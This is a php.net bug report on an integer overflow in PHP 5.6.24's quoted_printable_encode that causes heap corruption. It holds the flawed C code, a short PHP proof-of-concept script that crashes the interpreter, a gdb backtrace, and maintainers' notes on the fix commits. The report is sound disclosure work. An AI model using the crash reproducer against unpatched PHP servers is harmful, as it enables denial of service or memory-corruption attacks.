php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72848 integer overflow in quoted_printable_encode caused heap corruption
Submitted: 2016-08-16 07:38 UTC Modified: 2017-02-13 01:45 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.6.24 OS: ALL
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: minhrau dot vc dot 365 at gmail dot com
New email:
PHP Version: OS:

 

 [2016-08-16 07:38 UTC] minhrau dot vc dot 365 at gmail dot com
Description:
------------
An integer overflow in function php_quot_print_encode, will lead to heap corruption. Please check the detail of this vuln in comment below:

PHPAPI unsigned char *php_quot_print_encode(const unsigned char *str, size_t length, size_t *ret_length) /* {{{ */
{
	unsigned long lp = 0;
	unsigned char c, *ret, *d;
	char *hex = "0123456789ABCDEF";

	ret = safe_emalloc(3, length + (((3 * length)/(PHP_QPRINT_MAXL-9)) + 1), 1); // the size of safe_emalloc is larger than INT_MAX
	d = ret;

	while (length--) { 

Test script:
---------------
<?php

ini_set('memory_limit', -1);


$str = str_repeat('รด', 0xffffffff/4);

var_dump(strlen($str));


$str1 = quoted_printable_encode($str);
unset($str);
var_dump(strlen($str1));
chunk_split($str1, 11, $str1);
?>


Expected result:
----------------
No Crash

Actual result:
--------------
Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testquoted_printable_encode_negative.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
int(2147483646)
int(-1879048199)

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff1d92f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
#1  0x00000000006b053f in zif_chunk_split (ht=<optimized out>, return_value=0x7ffff7fa2fc8, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/standard/string.c:2221
#2  0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558
#3  0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f248) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363
#4  0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341
#5  0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0d0) at /home/minhrau/PHP-5.6.24/main/main.c:2613
#6  0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994
#7  0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378
(gdb) 


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-16 22:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-08-16 22:50 UTC] stas@php.net
The fix is in security repo as a29edf505ad1562ed1e468babf0b104d5c2fda9b and in https://gist.github.com/64e09c9dd01524d8c2a9f7e7e0ce32df

please verify
 [2016-08-17 05:57 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24d741d376905ab21eed17c25dd3ce09a8893f80
Log: Fix bug #72848 - integer overflow in quoted_printable_encode caused heap corruption
 [2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24d741d376905ab21eed17c25dd3ce09a8893f80
Log: Fix bug #72848 - integer overflow in quoted_printable_encode caused heap corruption
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24d741d376905ab21eed17c25dd3ce09a8893f80
Log: Fix bug #72848 - integer overflow in quoted_printable_encode caused heap corruption
 [2016-08-18 11:15 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=444314a2919587674c24777e56d29b4040b4fed4
Log: Fix bug #72848 - integer overflow in quoted_printable_encode caused heap corruption
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24d741d376905ab21eed17c25dd3ce09a8893f80
Log: Fix bug #72848 - integer overflow in quoted_printable_encode caused heap corruption
 [2017-02-13 01:45 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Dec 11 19:01:27 2024 UTC